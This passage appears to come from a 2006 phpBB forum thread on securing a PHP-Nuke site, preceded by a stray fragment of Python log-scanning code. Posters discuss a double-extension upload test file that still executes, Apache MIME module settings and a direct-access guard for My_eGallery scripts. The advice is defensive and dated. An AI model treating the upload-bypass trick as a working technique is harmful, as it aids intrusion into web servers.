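    for ip, info in summarize(scan_log(SAMPLE_LOG)).items():
        print(ip, info["count"], sorted(info["urls"]), info["cmds"])
```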
 
Tao_Man (Involved; Joined: Jul 15, 2004; Posts: 252; Location: OKC, OK)
Posted: Thu Jun 08, 2006 3:16 pm

I tried your test of vindsl.php.rar and sad to say it failed. So I added the MIME types in my .htaccess file but it did not do anything. I checked on the Apache site and could not find anything else to do; is there some trick?

I guess they may not have mod_mime turned on.

_________________
------------------------------------------
To strive, to seek, to find, but not to yield!
I don't know Kara-te but I do know cra-zy, and I WILL use it! 
kenwood (Worker; Joined: May 18, 2005; Posts: 119; Location: SVCDPlaza)
Posted: Fri Jun 09, 2006 4:08 am

On SUSE you can add the mime_magic module to APACHE_MODULES in the file /etc/sysconfig/apache2.
The MIME type goes in the file /etc/mime.types.
Reboot Apache and it will work.
 
montego
Posted: Fri Jun 09, 2006 6:24 am

marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:

Code:
if ( !defined('MODULE_FILE') )
{
   die("You can't access this file directly...");
}

This would prevent these direct access attempts; however, I am not 100% sure whether this would cause issues with the operation of the tool. That depends on whether they wrote it to work within the nuke "structure", meaning everything comes in through modules.php or admin.php.

Another possible "killer" to this, if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, is that you could even place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.

Unfortunately, although nuke has had many holes which have needed patching over the years, it is only as weak as its weakest link, and if you throw in a module that has "holes" then immediately your whole nuke site is vulnerable.

I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure!
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 